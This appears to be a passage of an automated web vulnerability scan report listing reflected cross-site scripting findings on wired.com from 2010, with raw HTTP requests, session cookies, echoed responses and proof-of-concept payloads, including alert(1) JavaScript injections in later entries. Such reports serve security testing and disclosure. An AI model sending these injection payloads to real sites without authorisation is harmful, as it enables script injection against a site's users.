<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services4f307"><a>0464dae629d ss_rss"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4dae"><a>7300f743ad1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/rsse4dae"><a>7300f743ad1/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:54 GMT Content-Length: 29341 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_rsse4dae"><a>7300f743ad1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384c1"><a>443f226f7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services384c1"><a>443f226f7b7/sitemap/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:56 GMT Date: Mon, 22 Nov 2010 01:08:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services384c1"><a>443f226f7b7 ss_sitemap"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0c7"><a>5bf57712b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/sitemap7c0c7"><a>5bf57712b5c/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_sitemap7c0c7"><a>5bf57712b5c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86ba"><a>1fdeb759811 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicese86ba"><a>1fdeb759811/staff/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29345 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:12:48 GMT Date: Mon, 22 Nov 2010 01:09:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicese86ba"><a>1fdeb759811 ss_staff"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f7e"><a>3b00f27932b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/staff56f7e"><a>3b00f27932b/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:51 GMT Content-Length: 29345 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_staff56f7e"><a>3b00f27932b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20f7"><a>259a66d40d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesf20f7"><a>259a66d40d4/useragreement/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:46 GMT Date: Mon, 22 Nov 2010 01:08:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesf20f7"><a>259a66d40d4 ss_useragreement"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e2b"><a>cf2de19af99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/useragreementc8e2b"><a>cf2de19af99/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_useragreementc8e2b"><a>cf2de19af99"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd50"><a>a4511ae9176 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software9fd50"><a>a4511ae9176 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29196 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:26 GMT Date: Mon, 22 Nov 2010 01:11:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software9fd50"><a>a4511ae9176"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46357"><a>d3030e2a7bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software46357"><a>d3030e2a7bf/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29197 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:04:06 GMT Date: Sun, 21 Nov 2010 20:00:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software46357"><a>d3030e2a7bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef060"><a>0d554ac2111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /softwareef060"><a>0d554ac2111/coolapps HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29217 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:02 GMT Date: Sun, 21 Nov 2010 23:13:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_softwareef060"><a>0d554ac2111 ss_coolapps"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fc1"><a>b463da81548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software/coolapps64fc1"><a>b463da81548 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29217 Vary: Accept-Encoding Cache-Control: max-age=595 Expires: Sun, 21 Nov 2010 23:23:19 GMT Date: Sun, 21 Nov 2010 23:13:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software ss_coolapps64fc1"><a>b463da81548"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dbd9"><a>73f2b0aee60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software1dbd9"><a>73f2b0aee60/softwarereviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29231 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:07 GMT Date: Sun, 21 Nov 2010 23:13:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software1dbd9"><a>73f2b0aee60 ss_softwarereviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504ae"><a>019705efbbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software/softwarereviews504ae"><a>019705efbbb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29231 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:29 GMT Date: Sun, 21 Nov 2010 23:13:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software ss_softwarereviews504ae"><a>019705efbbb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f306"><a>9703cc9441c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software4f306"><a>9703cc9441c/webservices HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29223 Vary: Accept-Encoding Cache-Control: max-age=237 Expires: Sun, 21 Nov 2010 23:17:05 GMT Date: Sun, 21 Nov 2010 23:13:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software4f306"><a>9703cc9441c ss_webservices"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c1"><a>7e145b38693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software/webservices572c1"><a>7e145b38693 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29223 Vary: Accept-Encoding Cache-Control: max-age=579 Expires: Sun, 21 Nov 2010 23:23:10 GMT Date: Sun, 21 Nov 2010 23:13:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software ss_webservices572c1"><a>7e145b38693"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc26d"><a>623e3dbca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /special_multimediacc26d"><a>623e3dbca4/2008/ff_futurefood_1611 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:21:50 GMT Date: Mon, 22 Nov 2010 01:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_special_multimediacc26d"><a>623e3dbca4 ss_2008 c_ff_futurefood_1611"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34135"><a>b00375039a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /special_multimedia/200834135"><a>b00375039a/ff_futurefood_1611 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:16:23 GMT Date: Mon, 22 Nov 2010 01:12:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <body class="s_special_multimedia ss_200834135"><a>b00375039a c_ff_futurefood_1611"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0c76"-alert(1)-"ba8f642ff66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /special_multimedia/2008f0c76"-alert(1)-"ba8f642ff66/ff_futurefood_1611 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 500 Internal Server Error Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:16:27 GMT Date: Mon, 22 Nov 2010 01:12:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfab"-alert(1)-"73871f1db9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
